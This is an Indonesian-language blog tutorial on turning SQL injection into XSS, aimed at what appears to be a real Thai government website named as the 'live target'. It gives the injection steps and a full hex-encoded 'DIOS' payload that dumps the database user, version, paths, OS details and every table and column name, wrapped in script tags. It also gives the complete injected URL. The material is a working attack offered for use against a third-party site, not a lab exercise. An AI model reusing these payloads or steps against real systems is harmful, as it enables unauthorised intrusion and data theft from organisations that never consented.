Lompat ke konten Lompat ke sidebar Lompat ke footer
Beranda / #xss #tutorial #challenge

TUTORIAL SQLI TO XSS CHALLENGE

by ./UCUP_GANS28. Posting Komentar

 


Hallo Sobat Bertemu Dengan Saya Nekell404. Kali Ini Saya Ingin Berbagi Materi Sqli To Xss Lengkap.


Siap kan bahan dulu
1.dios xss
2.dork cari sndiri
3.sm Dios sql

Nah kita langsung aja ke tutorial oke

Live targetnya = http://www.sanphudad.go.th/about.php?id=7


Nah pertama kita kasih tanda petik (') atau %27

Contoh : http://www.sanphudad.go.th/about.php?id=7%27




Nah error

Terus kita lanjut ke +order+by+1--+-

Contoh : http://www.sanphudad.go.th/about.php?id=7%27+order+by+1--+-

Nah error di angka 10



Abis itu kita +union+select+1,2,3,4,5,6,7,8,9--+-

Jangan lupa depan parameter kasih tanda (-)

Contoh : http://www.sanphudad.go.th/about.php?id=-7%27+union+select+1,2,3,4,5,6,7,8,9--+-



Nah kan ketemu angka ajaib nya di angka 3/2

Kita siapkan Dios nya terlebih dahulu

⟨Dios⟩

concat%0b(0x3c5343524950543e70726f6d70742822,0x4b4953534544204259202e2f554355502d4b554e,0x5c6e,0x555345523a3a20,user(),0x5c6e,0x56455253494f4e3a3a20,version(),0x5c6e,0x44415441424153453a3a20,database(),0x5c6e,0x426173654469723a3a20,@@basedir,0x5c6e,0x46696c655f5049443a3a20,@@PID_FILE,0x5c6e,0x4f532053797374656d3a3a20,@@VERSION_COMPILE_OS,0x5c6e,0x4d616368696e652053797374656d3a3a20,@@VERSION_COMPILE_MACHINE,0x5c6e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat%0b(@x,0x207c7c20,table_name,0x203a3a20,column_name))))x),0x222c646f63756d656e742e636861726163746572536574293c2f7363726970743e)

Nah setelah itu kita tempelkan Dios ke angka ajaib tersebut 3/2 itu

Contoh : http://www.sanphudad.go.th/about.php?id=-7%27+union+select+1,2,concat%0b(0x3c5343524950543e70726f6d70742822,0x4b4953534544204259202e2f554355502d4b554e,0x5c6e,0x555345523a3a20,user(),0x5c6e,0x56455253494f4e3a3a20,version(),0x5c6e,0x44415441424153453a3a20,database(),0x5c6e,0x426173654469723a3a20,@@basedir,0x5c6e,0x46696c655f5049443a3a20,@@PID_FILE,0x5c6e,0x4f532053797374656d3a3a20,@@VERSION_COMPILE_OS,0x5c6e,0x4d616368696e652053797374656d3a3a20,@@VERSION_COMPILE_MACHINE,0x5c6e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat%0b(@x,0x207c7c20,table_name,0x203a3a20,column_name))))x),0x222c646f63756d656e742e636861726163746572536574293c2f7363726970743e),4,5,6,7,8,9--+-




Dan tereng ok sekian dari saya Ucup terimakasih...

Posting Komentar untuk "TUTORIAL SQLI TO XSS CHALLENGE"